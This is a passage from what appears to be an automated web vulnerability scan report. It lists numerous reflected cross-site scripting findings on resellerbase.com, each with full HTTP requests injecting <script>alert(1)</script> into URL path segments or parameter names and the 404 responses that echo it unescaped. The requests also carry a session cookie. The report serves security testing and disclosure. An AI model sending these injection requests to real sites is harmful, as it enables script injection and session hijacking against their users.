The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2df91<script>alert(1)</script>d2ac13eff6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/?2df91<script>alert(1)</script>d2ac13eff6=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/?2df91<script>alert(1)</script>d2ac13eff6=1 was not found on this server.</p>
...[SNIP]...

2.2379. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c7798<script>alert(1)</script>ddbcddfc44e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc7798<script>alert(1)</script>ddbcddfc44e/35/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc7798<script>alert(1)</script>ddbcddfc44e/35/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2380. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20062<script>alert(1)</script>3154bbdd3c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3520062<script>alert(1)</script>3154bbdd3c0/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3520062<script>alert(1)</script>3154bbdd3c0/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2381. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 23fb7<script>alert(1)</script>79f0f0b6b2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes23fb7<script>alert(1)</script>79f0f0b6b2e/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes23fb7<script>alert(1)</script>79f0f0b6b2e/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2382. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c63e4<script>alert(1)</script>6fb6aaacf3e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmosc63e4<script>alert(1)</script>6fb6aaacf3e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmosc63e4<script>alert(1)</script>6fb6aaacf3e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2383. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6e639<script>alert(1)</script>29fc886c4c6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images6e639<script>alert(1)</script>29fc886c4c6/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images6e639<script>alert(1)</script>29fc886c4c6/rating/ was not found on this server.</p>
...[SNIP]...

2.2384. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload e9186<script>alert(1)</script>78b0e5f8504 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/ratinge9186<script>alert(1)</script>78b0e5f8504/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/ratinge9186<script>alert(1)</script>78b0e5f8504/ was not found on this server.</p>
...[SNIP]...

2.2385. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7b0bc<script>alert(1)</script>19c41b92b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/?7b0bc<script>alert(1)</script>19c41b92b46=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/?7b0bc<script>alert(1)</script>19c41b92b46=1 was not found on this server.</p>
...[SNIP]...

2.2386. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61b8c<script>alert(1)</script>1582439018e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail61b8c<script>alert(1)</script>1582439018e/35/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail61b8c<script>alert(1)</script>1582439018e/35/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2387. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8bbe1<script>alert(1)</script>461316c6734 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/358bbe1<script>alert(1)</script>461316c6734/themes/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/358bbe1<script>alert(1)</script>461316c6734/themes/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2388. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8b905<script>alert(1)</script>a969ef47afd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes8b905<script>alert(1)</script>a969ef47afd/kosmos/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes8b905<script>alert(1)</script>a969ef47afd/kosmos/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2389. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 33032<script>alert(1)</script>4b57522e688 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos33032<script>alert(1)</script>4b57522e688/images/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos33032<script>alert(1)</script>4b57522e688/images/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2390. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e138f<script>alert(1)</script>c2dbc105bf6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/imagese138f<script>alert(1)</script>c2dbc105bf6/rating/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/imagese138f<script>alert(1)</script>c2dbc105bf6/rating/3half.gif was not found on this server.</p>
...[SNIP]...

2.2391. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1a305<script>alert(1)</script>6de7fcb9614 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating1a305<script>alert(1)</script>6de7fcb9614/3half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating1a305<script>alert(1)</script>6de7fcb9614/3half.gif was not found on this server.</p>
...[SNIP]...

2.2392. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload ff297<script>alert(1)</script>d7ffd6a9d2f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/3half.gifff297<script>alert(1)</script>d7ffd6a9d2f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/3half.gifff297<script>alert(1)</script>d7ffd6a9d2f was not found on this server.</p>
...[SNIP]...

2.2393. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/3half.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/3half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e3933<script>alert(1)</script>128990fbf01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/3half.gif?e3933<script>alert(1)</script>128990fbf01=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/3half.gif?e3933<script>alert(1)</script>128990fbf01=1 was not found on this server.</p>
...[SNIP]...

2.2394. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 61160<script>alert(1)</script>c69e6f8e4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail61160<script>alert(1)</script>c69e6f8e4d/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail61160<script>alert(1)</script>c69e6f8e4d/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2395. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76f6d<script>alert(1)</script>a085e74cd87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3576f6d<script>alert(1)</script>a085e74cd87/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3576f6d<script>alert(1)</script>a085e74cd87/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2396. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e2ed3<script>alert(1)</script>265800b6cf2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themese2ed3<script>alert(1)</script>265800b6cf2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themese2ed3<script>alert(1)</script>265800b6cf2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2397. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

